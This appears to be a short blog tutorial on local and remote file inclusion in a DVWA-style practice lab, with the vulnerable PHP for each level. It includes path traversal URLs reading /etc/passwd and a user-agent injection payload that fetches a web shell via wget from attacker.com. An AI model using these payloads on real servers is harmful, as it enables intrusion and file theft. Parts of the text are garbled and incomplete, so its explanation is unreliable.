LFI (Local File Inclusion) is a hole at the site where the attacker can access all files on the server with only through the URL.RFI (Remote File Inclusion) is a hole where the site permits an attacker to include a file from outside the server.
=low level=
<?php
$file = $_GET['page'];
?> url=http://110.76.151.11/madara/vulnerabilities/fi/?page=/etc/passwd
result :
=medium level=
<?php
$file = $_GET['page'];
$file = str_replace("http://", "", $file);
$file = str_replace("https://", "", $file); ?> url=http://110.76.151.11/madara/vulnerabilities/fi/?page=../../../../../etc/passwd
result :
exploit both = <?system("wget http://attacker.com/shell.php";)?> inject that script into user agent.
=high level=
=high level=
<?php $file = $_GET['page'];
if ( $file != "include.php" ) {
echo "ERROR: File not found!"; exit;
}
?> 
do the same thing, but instead of cookies to be low or medium level, because the variables seem. and we can change it
0 komentar:
Posting Komentar